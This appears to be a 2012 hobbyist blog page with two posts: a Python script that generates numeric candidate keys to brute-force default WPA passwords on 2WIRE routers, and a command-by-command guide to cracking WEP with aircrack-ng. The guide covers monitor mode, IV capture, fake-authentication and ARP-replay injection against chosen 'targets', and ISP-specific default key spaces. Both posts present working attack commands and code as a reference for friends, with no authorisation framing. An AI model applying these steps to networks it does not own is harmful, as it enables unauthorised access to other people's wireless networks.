UPDATE: Cracking 2WIRE WPA1/2

Tuesday, October 23, 2012 Posted by Unknown 0 comments

My previous post had a few problems with the script. Then I had updated the script to work properly. http://pastie.org/5101804  However, it was still way to slow. Asked around and found the following solution.  

http://pastie.org/5104479



#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any numbers that repeat them selfs more then 3 times like 333

import sys
from threading import Thread

def count1(first, ver):
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + str(number).rjust(9, '0') )

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
    
        except: # Exception, errtxt:
           print ( errtxt )


Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.
Labels: , , , , , , ,

My Method for cracking WEP

Friday, October 19, 2012 Posted by Unknown 0 comments

There are 100's if not 1000's of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP them self's.

Aircrack-ng's guide to cracking WEP

Download and boot off of backtrack 5 r3 To install it on a flash drive use linux/windows tool YUMI

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

 #airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

 You should see several AP. Record the BSSID, ESSID, and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (with WEP its not as necessary to lock the channel in on the driver as you have to with WPA)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>

 Now you need to inject packets. This will send packets to the access point as the other associated client generating your golden IVS you need to crack the WEP. 

 #aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

 If the above isn't generating any IVs you might need to tweak your command line. 

 #aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

Success looks like: (Stole this output from http://www.aircrack-ng.org)
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.
Here is an example of what a failed authentication looks like:
8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


 You can also do a ARP request replay attack. Either at the same time or in lieu of the above attack. 

 #aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>
Here is what the screen looks like when ARP requests are being injected:
 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


 Now to crack the IV's you have obtain. There are a lot of different options at this point. For example. AT&T U-verse default wep is only numbers. Verizon FIOS wep is 0-9A-F. Doing home work on the default SSID might lead to a quicker crack.
Static WEP cracking options:
-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.


 #aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select your network you want to crack and show how many IV's it currently has. 

 I only use the -f 1 option to get keys that are to easy and are thought to be false positives i.e. 123456789 or 111111111 

 and remember a few quick google searches on the SSID (if its a default SSID) can save you a lot of time. 

 Side note: if you run:

 #iwconfig wlan0

And your power isn't set correctly to your gear you can change this by.

 #iwconfig wlan0 twpower <dbi>
This is not a complete guide of everything you can do. Its just what I do and have a high success rate. if you have any questions feel free to drop me a e-mail/Gtalk at init6@init6.me 
Labels: , ,
Subscribe to: Posts (Atom)